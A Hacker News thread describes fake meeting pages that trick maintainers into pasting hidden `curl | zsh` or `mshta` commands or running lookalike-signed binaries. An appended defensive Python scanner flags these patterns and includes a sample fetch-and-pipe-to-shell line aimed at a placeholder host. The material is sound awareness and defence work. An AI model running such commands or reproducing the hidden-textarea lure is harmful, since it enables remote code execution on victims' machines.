Hacker News

hatmanstack, today at 2:27 AM

jasonsaayman and voxpelli had useful write-ups from the "head on a swivel" perspective of what to watch out for. Jason mentioned "the meeting said something on my system was out of date." They were using Microsoft meeting and that's how they got RCE. Would love more color on that.


Replies

pas, today at 9:08 AM

They are cloning Zoom and MS Teams and trying to get people to either copy a script (which sits in a textarea that's conveniently too small to show the whole script, with the scrollbars hidden by CSS and a convenient copy button; when you paste it into the terminal you'll see only the last few lines, which also look innocent, but there's a `curl | zsh` or `mshta` somewhere in there), or download and run a binary/.dmg (which might even be signed by "GoogIe LLC." - the name chosen to look right in the usual typeface used on macOS).

...

It seems the correct muscle-memory response to train into people is: "if some meeting link someone sent you doesn't work, then you should create one and send them the link."

(And of course never download and execute anything, don't copy scripts into terminals, but it seems even veteran maintainers do this, etc...)

See the Infection Chain here: https://cloud.google.com/blog/topics/threat-intelligence/unc...

Textarea at the bottom of this comment: https://github.com/axios/axios/issues/10636#issuecomment-418...

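Editor's added example, not code from either commenter: a small "paste guard" that inspects a script before it reaches a terminal, flagging a remote fetch piped into a shell and any `mshta` invocation, and marking whether the hit sits outside the last few lines a cramped textarea or paste preview would show (the lure described above). The sample script, the `example.invalid` URL and the function name are constructed for illustration.

```python
import re

# Patterns for the two lures the comment describes: a remote fetch piped
# straight into a shell, and mshta (a Windows binary that runs remote HTA content).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
MSHTA = re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE)


def scan_pasted_script(text: str, visible_tail: int = 3) -> list[dict]:
    """Return one finding per suspicious line in `text`.

    `visible_tail` models how many trailing lines a small copy box or a
    terminal paste preview actually shows; a finding above that window is
    marked hidden=True, i.e. the reader would never have seen it.
    """
    lines = text.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        reasons = []
        if PIPE_TO_SHELL.search(line):
            reasons.append("remote content piped to a shell")
        if MSHTA.search(line):
            reasons.append("mshta invocation")
        if reasons:
            findings.append({
                "line_no": idx + 1,
                "text": line.strip(),
                "reasons": reasons,
                "hidden": idx < len(lines) - visible_tail,
            })
    return findings


# Constructed sample: benign-looking setup lines bracket the payload, so a
# three-line tail view shows only "Restart ... / Done. / exit 0".
SAMPLE = """\
# Meeting audio fix - run this once
echo "Checking audio drivers..."
export MEETING_FIX=1
curl -fsSL https://example.invalid/fix.sh | zsh
echo "Restart your meeting client."
echo "Done."
exit 0
"""

if __name__ == "__main__":
    for f in scan_pasted_script(SAMPLE):
        where = "HIDDEN" if f["hidden"] else "visible"
        print(f"line {f['line_no']} [{where}]: {', '.join(f['reasons'])}: {f['text']}")
```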